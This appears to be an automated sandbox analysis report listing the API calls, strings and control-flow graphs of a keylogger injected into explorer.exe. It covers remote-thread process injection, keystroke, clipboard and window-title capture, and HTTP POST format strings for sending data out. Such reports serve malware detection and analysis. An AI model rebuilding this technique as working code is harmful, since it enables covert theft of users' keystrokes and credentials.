                                                                                                                              • Opcode ID: 1b6959e098595a20caad2d8d99496696b42a3f80af8b1319e2eab4ef6d65160e
                                                                                                                              • Instruction ID: e2939f5ac73575f5a1cebdf3d30c6f27ad0472fd98cae28142fd3738bfa40b77
                                                                                                                              • Opcode Fuzzy Hash: 1b6959e098595a20caad2d8d99496696b42a3f80af8b1319e2eab4ef6d65160e
                                                                                                                              • Instruction Fuzzy Hash: 4B51B1302047019BC714AF70DCBCA6A7FA9FB95743F00052ABD4A872F1EB249A4D9B61

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
                                                                                                                                • Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13
                                                                                                                              • wsprintfA.USER32 ref: 005510E7
                                                                                                                                • Part of subcall function 0055276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00552777
                                                                                                                                • Part of subcall function 0055276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,005510FE), ref: 00552789
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00551155
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00551160
                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 0055117F
                                                                                                                              • CharLowerA.USER32(?), ref: 00551199
                                                                                                                              • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 005511B5
                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00551212
                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0055126C
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0055127F
                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 0055129F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                              • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                              • API String ID: 3018447944-2805246637
                                                                                                                              • Opcode ID: cbd182b90ecf0db031203a08b423793d34b20721efde2a39be554090702d3f44
                                                                                                                              • Instruction ID: 3b56842651fcc47d7f283433ae5ae5c6c2230f9646649223bb0dec635eb8c57c
                                                                                                                              • Opcode Fuzzy Hash: cbd182b90ecf0db031203a08b423793d34b20721efde2a39be554090702d3f44
                                                                                                                              • Instruction Fuzzy Hash: B141D6302047055BC714AF618CBDA3A7FA9FB95787F00062ABD45832E1EF349E0D9751

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 122 559ae0-559ae5 123 559cad 122->123 124 559aeb-559af8 122->124 123->123 125 559b0a-559b0f 124->125 126 559b11 125->126 127 559b00-559b05 126->127 128 559b13 126->128 129 559b06-559b08 127->129 130 559b18-559b1a 128->130 129->125 129->126 131 559b23-559b27 130->131 132 559b1c-559b21 130->132 131->130 133 559b29 131->133 132->131 134 559b34-559b39 133->134 135 559b2b-559b32 133->135 136 559b48-559b4a 134->136 137 559b3b-559b44 134->137 135->130 135->134 140 559b53-559b57 136->140 141 559b4c-559b51 136->141 138 559b46 137->138 139 559bba-559bbd 137->139 138->136 142 559bc2-559bc5 139->142 143 559b60-559b62 140->143 144 559b59-559b5e 140->144 141->140 145 559bc7-559bc9 142->145 146 559b84-559b93 143->146 147 559b64 143->147 144->143 145->142 150 559bcb-559bce 145->150 148 559b95-559b9c 146->148 149 559ba4-559bb1 146->149 151 559b65-559b67 147->151 148->148 152 559b9e 148->152 149->149 153 559bb3-559bb5 149->153 150->142 154 559bd0-559bec 150->154 155 559b70-559b74 151->155 156 559b69-559b6e 151->156 152->129 153->129 154->145 157 559bee 154->157 155->151 158 559b76 155->158 156->155 159 559bf4-559bf8 157->159 160 559b81 158->160 161 559b78-559b7f 158->161 162 559c3f-559c42 159->162 163 559bfa-559c10 LoadLibraryA 159->163 160->146 161->151 161->160 164 559c45-559c4c 162->164 165 559c11-559c16 163->165 166 559c70-559ca0 VirtualProtect * 2 164->166 167 559c4e-559c50 164->167 165->159 168 559c18-559c1a 165->168 173 559ca4-559ca8 166->173 171 559c63-559c6e 167->171 172 559c52-559c61 167->172 169 559c23-559c30 GetProcAddress 168->169 170 559c1c-559c22 168->170 174 559c32-559c37 169->174 175 559c39-559c3c 169->175 170->169 171->172 172->164 173->173 176 559caa 173->176 174->165 176->123
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000558000.00000040.80000000.00040000.00000000.sdmp, Offset: 00558000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_558000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 99db8da8ea2769c0ee53a94276b3a8c1ef743623185cac298862f4e59f457cfe
                                                                                                                              • Instruction ID: 0dcfabfec9d3dad02d581f3513fe30e7471c00e17a68ca633ac376b3cc4ffe6a
                                                                                                                              • Opcode Fuzzy Hash: 99db8da8ea2769c0ee53a94276b3a8c1ef743623185cac298862f4e59f457cfe
                                                                                                                              • Instruction Fuzzy Hash: F051C771A58252CAE7219A78DCA07A5BF94FB51332B18072ACDE5C72C6E7985C0EC750

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 177 55276d-55277f OpenFileMappingA 178 552794-552798 177->178 179 552781-552791 MapViewOfFile 177->179 179->178
                                                                                                                              APIs
                                                                                                                              • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00552777
                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,005510FE), ref: 00552789
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3439327939-0
                                                                                                                              • Opcode ID: 4a9ea7d34a8eb6abf3c0502c5d7c0a2ff5992e82784d5b5cc149b8dc18972037
                                                                                                                              • Instruction ID: 9bfd2476d5ab1d77cd589a2653e0b97b07d5e040bdb2dba1133dae6a5c34b17b
                                                                                                                              • Opcode Fuzzy Hash: 4a9ea7d34a8eb6abf3c0502c5d7c0a2ff5992e82784d5b5cc149b8dc18972037
                                                                                                                              • Instruction Fuzzy Hash: D3D01732711331BBE3745A7B6C1CF83AE9DDF96AF2B010025B90DD21A0E6608810C2F0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 180 55275a-55276c UnmapViewOfFile CloseHandle
                                                                                                                              APIs
                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,0055129A,00000001), ref: 0055275E
                                                                                                                              • CloseHandle.KERNELBASE(?,?,0055129A,00000001), ref: 00552765
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseFileHandleUnmapView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2381555830-0
                                                                                                                              • Opcode ID: 97615d5cab79e2de506513d67baa3b895f9f39f1f44666a94036af2d31988717
                                                                                                                              • Instruction ID: be33d93b5eed15e2166115425b27d02fedcfb1208110d49a193512dd64aa9d8d
                                                                                                                              • Opcode Fuzzy Hash: 97615d5cab79e2de506513d67baa3b895f9f39f1f44666a94036af2d31988717
                                                                                                                              • Instruction Fuzzy Hash: 72B0123340533097C35427347C1C8DB3E18EE592A33050144F10D8207057240B05A6E8

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 181 552a09-552a19 GetProcessHeap RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00552A13
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1357844191-0
                                                                                                                              • Opcode ID: f03836c81669329769b20e79bcf44dcb6e4abde5d19fe6dd51ea5dd8846a9700
                                                                                                                              • Instruction ID: 5a541df433f57693d00c4a9064728ce127d30b9e5516858e186afb7b4a92a15d
                                                                                                                              • Opcode Fuzzy Hash: f03836c81669329769b20e79bcf44dcb6e4abde5d19fe6dd51ea5dd8846a9700
                                                                                                                              • Instruction Fuzzy Hash: D4A002B56503006BDF4557A49D1DF157658A754743F004544724EC50F09D75555CA721

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00552724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,005529F3,-00000001,0055128C), ref: 00552731
                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 005518F4
                                                                                                                              • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0055192F
                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 005519BF
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00553638,00000016), ref: 005519E6
                                                                                                                              • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00551A0E
                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00551A1E
                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00551A38
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00551A40
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551A4E
                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551A55
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00551A6B
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00551A72
                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00551A88
                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00551AB2
                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00551AC5
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551ACC
                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551AD3
                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00551AE7
                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00551AFE
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551B0B
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551B11
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551B17
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00551B1A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                              • String ID: atan$ntdll$opera_shared_counter
                                                                                                                              • API String ID: 1066286714-2737717697
                                                                                                                              • Opcode ID: 976585acce2e767f2cda5236c659f40c4bda385099070ca38aa9e26eae7ca163
                                                                                                                              • Instruction ID: 1ab536d372d8a1bf3c966296061f21b15bc69a1257d47ed6ee3ff4353c0d36bd
                                                                                                                              • Opcode Fuzzy Hash: 976585acce2e767f2cda5236c659f40c4bda385099070ca38aa9e26eae7ca163
                                                                                                                              • Instruction Fuzzy Hash: 15617D71204705AFD310DF64CCA8E6BBFECFB98796F00051AF949932A1D670D908CBA6

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 005527B5
                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 005527CD
                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 005527D5
                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 005527E0
                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 005527FA
                                                                                                                              • wsprintfA.USER32 ref: 00552811
                                                                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 0055282A
                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00552834
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                              • String ID: %02X
                                                                                                                              • API String ID: 3341110664-436463671
                                                                                                                              • Opcode ID: 90e4bae6295b66c000c0940bcf50de8a302a0a4aba46d7e1da11683ef70ce54a
                                                                                                                              • Instruction ID: ef32dcb0cda569ee92b73841b2d664e0f5704c298054f8054268f19cfbf37fbf
                                                                                                                              • Opcode Fuzzy Hash: 90e4bae6295b66c000c0940bcf50de8a302a0a4aba46d7e1da11683ef70ce54a
                                                                                                                              • Instruction Fuzzy Hash: 9B112E71900208BFDB119BA5DC5CEAEBFBCEB48352F5040A5F909E2160E6715F59AB60
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 00551652
                                                                                                                              • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0055167A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: KeyboardStateUnicode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3453085656-3916222277
                                                                                                                              • Opcode ID: 9fec1649cc358a32f837e89ffc1a70b4368a7399169221b8ce9051645f99ba72
                                                                                                                              • Instruction ID: b1e8ed52622fceb6536e0f1eca00ee016cce25b1268681febb0f855ce615d0b1
                                                                                                                              • Opcode Fuzzy Hash: 9fec1649cc358a32f837e89ffc1a70b4368a7399169221b8ce9051645f99ba72
                                                                                                                              • Instruction Fuzzy Hash: 3C01A132900A099ADB30CB50D9A5BBB7FBCBF55702F18401BED05A2851D630E9498BA9

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • RtlZeroMemory.NTDLL(00555013,0000001C), ref: 005513C8
                                                                                                                              • VirtualQuery.KERNEL32(005513AE,?,0000001C), ref: 005513DA
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0055140B
                                                                                                                              • GetCurrentProcessId.KERNEL32(00000004), ref: 0055141C
                                                                                                                              • wsprintfA.USER32 ref: 00551433
                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00551448
                                                                                                                              • GetLastError.KERNEL32 ref: 0055144E
                                                                                                                              • RtlInitializeCriticalSection.NTDLL(0055582C), ref: 00551465
                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00551489
                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 005514A6
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 005514AF
                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 005514D0
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 005514D3
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 005514F1
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0055150D
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00551514
                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 0055152A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                              • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                              • API String ID: 3628807430-1779906909
                                                                                                                              • Opcode ID: a755b3bc8e1de30c1bab3fd5818d0298baf33f8021ead8730e91bacb296aee0a
                                                                                                                              • Instruction ID: 85239b2be71ae2380f43c1cfe51787102b6aa0d0e0968e977cec904356fe48bb
                                                                                                                              • Opcode Fuzzy Hash: a755b3bc8e1de30c1bab3fd5818d0298baf33f8021ead8730e91bacb296aee0a
                                                                                                                              • Instruction Fuzzy Hash: 7241C670600705ABD710ABA5DC7DE1B3FACFB95793B00401AFD09862A1EB75990C9BA5

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • RtlEnterCriticalSection.NTDLL(0055582C), ref: 005516C4
                                                                                                                              • lstrlenW.KERNEL32 ref: 005516DB
                                                                                                                              • lstrlenW.KERNEL32 ref: 005516F3
                                                                                                                              • wsprintfW.USER32 ref: 00551743
                                                                                                                              • GetForegroundWindow.USER32 ref: 0055174E
                                                                                                                              • GetWindowTextW.USER32(00000000,00555850,00000800), ref: 00551767
                                                                                                                              • GetClassNameW.USER32(00000000,00555850,00000800), ref: 00551774
                                                                                                                              • lstrcmpW.KERNEL32(00555020,00555850), ref: 00551781
                                                                                                                              • lstrcpyW.KERNEL32(00555020,00555850), ref: 0055178D
                                                                                                                              • wsprintfW.USER32 ref: 005517AD
                                                                                                                              • lstrcatW.KERNEL32 ref: 005517C6
                                                                                                                              • RtlLeaveCriticalSection.NTDLL(0055582C), ref: 005517D3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                              • String ID: Clipboard -> $ New Window Caption -> $ PU$%s%s%s$%s%s%s%s$PXU
                                                                                                                              • API String ID: 2651329914-551020702
                                                                                                                              • Opcode ID: b30927d3466e0970ce135d34481a74987fc5e5ed3cb51481ff2cae6f8c23fe9d
                                                                                                                              • Instruction ID: 820c4f1de83a3d73c7cfcf0189fe66df5af69a778ef0ad72eeeb9a0b5d9d7a25
                                                                                                                              • Opcode Fuzzy Hash: b30927d3466e0970ce135d34481a74987fc5e5ed3cb51481ff2cae6f8c23fe9d
                                                                                                                              • Instruction Fuzzy Hash: 6921B630510B04ABC3212779EC7CA2B3F68FB557977140026FC09521B1EA119D0CE7A9

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00552603
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0055260B
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0055261B
                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 00552629
                                                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00552648
                                                                                                                              • SuspendThread.KERNEL32(00000000), ref: 00552658
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00552667
                                                                                                                              • Thread32Next.KERNEL32(00000000,0000001C), ref: 00552677
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00552682
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1467098526-0
                                                                                                                              • Opcode ID: e92e7aa54c283be45d7f69d05523afcc8f64655f8d8d3516e1dd936d72709a6f
                                                                                                                              • Instruction ID: f3df737ba399dd2241854bdfdae64942bfe7dc1bbcd936904709e4d2a5125447
                                                                                                                              • Opcode Fuzzy Hash: e92e7aa54c283be45d7f69d05523afcc8f64655f8d8d3516e1dd936d72709a6f
                                                                                                                              • Instruction Fuzzy Hash: 34118232405300EFD7019F60AC6CA6FBFA4FF55793F04042AF94A921A0D7308A1DABA3

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 294 5520a1-5520fc call 55240f call 552a09 call 55298a call 5524cc 303 552117-552123 294->303 304 5520fe-552115 294->304 307 552127-552129 303->307 304->307 308 5523fd-55240c call 5529eb 307->308 309 55212f-552166 RtlZeroMemory 307->309 313 5523f5-5523fc 309->313 314 55216c-552187 309->314 313->308 315 5521b9-5521cb 314->315 316 552189-55219a call 55243d 314->316 321 5521cf-5521d1 315->321 322 5521ad 316->322 323 55219c-5521ab 316->323 325 5521d7-552233 call 55288d 321->325 326 5523e2-5523e8 321->326 324 5521af-5521b7 322->324 323->324 324->321 334 552239-55223e 325->334 335 5523db 325->335 328 5523f1 326->328 329 5523ea-5523ec call 5529eb 326->329 328->313 329->328 336 552240-552251 334->336 337 552258-552286 call 552a09 wsprintfW 334->337 335->326 336->337 340 55229f-5522b6 337->340 341 552288-55228a 337->341 347 5522f5-55230f 340->347 348 5522b8-5522ee call 552a09 wsprintfW 340->348 342 55228b-55228e 341->342 343 552290-552295 342->343 344 552299-55229b 342->344 343->342 346 552297 343->346 344->340 346->340 352 552315-552328 347->352 353 5523b8-5523ce call 5529eb 347->353 348->347 352->353 356 55232e-552344 call 552a09 352->356 361 5523d7 353->361 362 5523d0-5523d2 call 5529eb 353->362 363 552346-552351 356->363 361->335 362->361 365 552365-55237c 363->365 366 552353-552360 call 5529ce 363->366 370 552380-55238d 365->370 371 55237e 365->371 366->365 370->363 372 55238f-552393 370->372 371->370 373 552395 372->373 374 5523ad-5523b4 call 5529eb 372->374 375 552395 call 5529bd 373->375 374->353 377 55239a-5523a7 RtlMoveMemory 375->377 377->374
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
                                                                                                                                • Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13
                                                                                                                                • Part of subcall function 0055298A: lstrlen.KERNEL32(00554FE2,?,00000000,00000000,005520DD,74DE8A60,00554FE2,00000000), ref: 00552992
                                                                                                                                • Part of subcall function 0055298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00554FE2,00000001,00000000,00000000), ref: 005529A4
                                                                                                                                • Part of subcall function 005524CC: RtlZeroMemory.NTDLL(?,00000018), ref: 005524DE
                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 00552139
                                                                                                                              • wsprintfW.USER32 ref: 00552272
                                                                                                                              • wsprintfW.USER32 ref: 005522DD
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 005523A7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                              • API String ID: 4204651544-1701262698
                                                                                                                              • Opcode ID: 72cf60d5243a2a9bba8996a7fc9a08092dcec3e2b42bfbf477df7347931294f4
                                                                                                                              • Instruction ID: e52f50d1c4b55746595a773670e56afe19ca4369853004f1e05b22bf29a45e1b
                                                                                                                              • Opcode Fuzzy Hash: 72cf60d5243a2a9bba8996a7fc9a08092dcec3e2b42bfbf477df7347931294f4
                                                                                                                              • Instruction Fuzzy Hash: 30A16D71608741AFD7109F68D8A8A2BBBE8FB89741F00082EF989D7351DA74DD08CB52

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 379 5524cc-5524f0 RtlZeroMemory 381 552514 379->381 382 5524f2-552504 379->382 384 552517-552519 381->384 382->381 383 552506-552512 382->383 383->384 385 552554-552559 384->385 386 55251b-552545 384->386 389 552547-55254a 386->389 390 55254c-552553 386->390 389->390 390->385
                                                                                                                              APIs
                                                                                                                              • RtlZeroMemory.NTDLL(?,00000018), ref: 005524DE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryZero
                                                                                                                              • String ID: U$OU$OU$OU U
                                                                                                                              • API String ID: 816449071-188478793
                                                                                                                              • Opcode ID: 20e1daab5973831c9cd70b61da3f20f5d259a2d939060d49c62a55e9064ef55c
                                                                                                                              • Instruction ID: b0cc191c80610f63005d5bfab17eda84efb14c8aff06234e2363ecbd40f3e1bb
                                                                                                                              • Opcode Fuzzy Hash: 20e1daab5973831c9cd70b61da3f20f5d259a2d939060d49c62a55e9064ef55c
                                                                                                                              • Instruction Fuzzy Hash: 2911FEB1A01209AFDB10DFA9D894ABEBBBCFB49742F100429F945D7240E730DD08DB60

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • RtlEnterCriticalSection.NTDLL(0055582C), ref: 00551839
                                                                                                                              • lstrlenW.KERNEL32 ref: 00551845
                                                                                                                              • RtlLeaveCriticalSection.NTDLL(0055582C), ref: 005518A9
                                                                                                                              • Sleep.KERNEL32(00007530), ref: 005518B4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                              • String ID: ,XU
                                                                                                                              • API String ID: 2134730579-2809468081
                                                                                                                              • Opcode ID: e31d2850cf18d6bd65ed8047d3313147005f8553b71b544cc616f737de12b8dd
